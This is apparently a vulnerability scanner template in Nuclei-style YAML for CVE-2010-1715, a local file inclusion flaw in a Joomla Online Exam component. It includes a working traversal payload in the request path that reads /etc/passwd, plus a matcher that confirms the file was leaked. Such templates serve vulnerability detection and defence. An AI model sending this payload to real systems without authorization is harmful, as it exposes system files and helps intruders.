44 lines
1.7 KiB
YAML
44 lines
1.7 KiB
YAML
id: CVE-2010-1715
|
|
|
|
info:
|
|
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
|
remediation: |
|
|
Update to the latest version of Joomla! Component Online Exam and apply any available patches or security updates.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/12174
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-1715
|
|
- http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57677
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
|
cvss-score: 6.8
|
|
cve-id: CVE-2010-1715
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01242
|
|
epss-percentile: 0.85468
|
|
cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: pucit.edu
|
|
product: com_onlineexam
|
|
tags: cve,cve2010,joomla,lfi,edb,packetstorm,pucit.edu
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100a9b34fe0a7da0582ef2dc9ed994e6f7c8805d5e3a7696068a29d89923a913df8022100869ef62055b34cb46a7e175e4df24c22713574e5763d263f77e84f873f33c6d0:922c64590222798bb761d5b6d8e72950 |